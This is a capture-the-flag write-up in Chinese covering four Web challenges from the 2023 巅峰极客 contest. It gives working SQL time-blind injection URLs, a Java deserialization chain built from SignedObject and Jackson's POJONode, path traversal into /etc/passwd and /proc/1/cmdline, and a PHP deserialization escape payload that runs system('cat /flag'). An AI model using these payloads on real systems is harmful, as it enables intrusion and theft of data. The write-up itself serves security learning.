巅峰极客 2023 Web Write Up - Boogiepop Doesn't Laugh

这次排名是第十好像，不错，Web也AK了。但还是感觉自己菜

hellosql

过滤：union, * , sleep, benchmark，rpad，or if
目前的payload语句为1’ or elt(2>1,xxx)，先看看盲注

时间盲注，用笛卡尔积

/index.php?id=1'or+elt(1>2,(SELECT+group_concat('1')+FROM+information_schema.columns+A,+information_schema.columns+B))+or'2

/index.php?id=1'or+elt(3>2,(SELECT+group_concat('1')+FROM+information_schema.columns+A,+information_schema.columns+B))+or'2

脚本如上。点击就能抛出flag了

BabyURL

不知道为什么，我看到这一段代码感觉十分的奇妙


预期应该是在visiturl里面任意文件读，绕过黑名单只需要二次反序列化即可。

package org.example;

import com.alibaba.fastjson.JSONObject;
import com.fasterxml.jackson.databind.node.POJONode;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import com.yancao.ctf.bean.URLHelper;
import com.yancao.ctf.bean.URLVisiter;
import javassist.ClassPool;
import javassist.CtClass;
import javassist.CtConstructor;
import org.springframework.http.HttpEntity;
import org.springframework.http.HttpHeaders;
import org.springframework.http.ResponseEntity;
import org.springframework.web.client.RestTemplate;

import javax.management.BadAttributeValueExpException;
import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.net.URI;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.*;
import java.util.Base64;

public class SignedObjectChain {
    public static void main(String[] args) throws Exception {
        URLHelper urlHelper = new URLHelper(" file:///F14gIsHereY0UGOTIT");
        URLVisiter urlVisiter = new URLVisiter();
        setFieldValue(urlHelper,"visiter",urlVisiter);
        KeyPairGenerator keyPairGenerator;
        keyPairGenerator = KeyPairGenerator.getInstance("DSA");
        keyPairGenerator.initialize(1024);
        KeyPair keyPair = keyPairGenerator.genKeyPair();
        PrivateKey privateKey = keyPair.getPrivate();
        Signature signingEngine = Signature.getInstance("DSA");
        SignedObject signedObject = new SignedObject(urlHelper,privateKey,signingEngine);
        POJONode jsonNodes = new POJONode(signedObject);
        BadAttributeValueExpException exp = new BadAttributeValueExpException(1);
        Field val = Class.forName("javax.management.BadAttributeValueExpException").getDeclaredField("val");
        val.setAccessible(true);
        val.set(exp,jsonNodes);
        System.out.println(serial(exp));
    }

    public static String serial(Object o) throws IOException, NoSuchFieldException {
        ByteArrayOutputStream baos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(baos);
        oos.writeObject(o);
        oos.close();

        String base64String = Base64.getEncoder().encodeToString(baos.toByteArray());
        return base64String;

    }

    public static void deserial(String data) throws Exception {
        byte[] base64decodedBytes = Base64.getDecoder().decode(data);
        ByteArrayInputStream bais = new ByteArrayInputStream(base64decodedBytes);
        ObjectInputStream ois = new ObjectInputStream(bais);
        ois.readObject();
        ois.close();
    }

    private static void Base64Encode(ByteArrayOutputStream bs){
        byte[] encode = Base64.getEncoder().encode(bs.toByteArray());
        String s = new String(encode);
        System.out.println(s);
        System.out.println(s.length());
    }
    private static void setFieldValue(Object obj, String field, Object arg) throws Exception{
        Field f = obj.getClass().getDeclaredField(field);
        f.setAccessible(true);
        f.set(obj, arg);
    }
    }

先打完反序列化，然后进入file路由读取flag，file伪协议列目录，获取flag的名字F14gIsHereY0UGOTIT
flag{q0IZIYutLQuwncivpPFLcyLFULuybMgV}

hinder

/anything/../hinder/ 绕过路径，获取/download.action?filename=hint

随后发现是因为文件不存在，或者路径不对，因此需要../../../../../etc/passwd这样子，可以读出如下文件
web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
         version="4.0">
    <filter>
        <filter-name>filter</filter-name>
        <filter-class>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>myFilter</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
    <filter>
        <filter-name>myFilter</filter-name>
        <filter-class>ctf.hinder.myFilter</filter-class>
    </filter>
    <filter-mapping>
        <filter-name>filter</filter-name>
        <url-pattern>/*</url-pattern>
    </filter-mapping>
</web-app>

METAINF
stucts.xml
感觉像是逃逸
非预期，看/proc/1/cmdline,看到了run.sh
然后run.sh里面有flag名字
flag{09CpthqhCiti10YxOcntJO0Ucch3QLQ8}

unserialize

www.zip源码泄漏，反序列化字符逃逸，a和b会进行字符替换。
利用点在pull_it的析构函数里，取反绕过一下析构函数的过滤，字符长度变短的字符逃逸，手动构造一下Payload：

root=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb

pwd=";s:12:"%00push_it%00pwd";O%3A7%3A%22pull_it%22%3A1%3A%7Bs%3A10%3A%22%00pull_it%00x%22%3Bs%3A13%3A%22%28%7E%8F%97%8F%96%91%99%90%29%28%29%3B%22%3B%7D}

但是在

$login = @unserialize(a($_SESSION['login']));
echo $login;

会因为__toString没有返回一个字符串导致报错，Fast Destruct数组绕一下，构造：

root=bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb&pwd=1";s:12:"%00push_it%00pwd";a:2:{i:1;O:7:"pull_it":1:{s:10:"%00pull_it%00x";s:22:"(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%D0%99%93%9E%98);";};i:1;N;}

先index后login
flag{6TbutvDVCMDeR8q9Kb4cCQBlIAgJGYLM}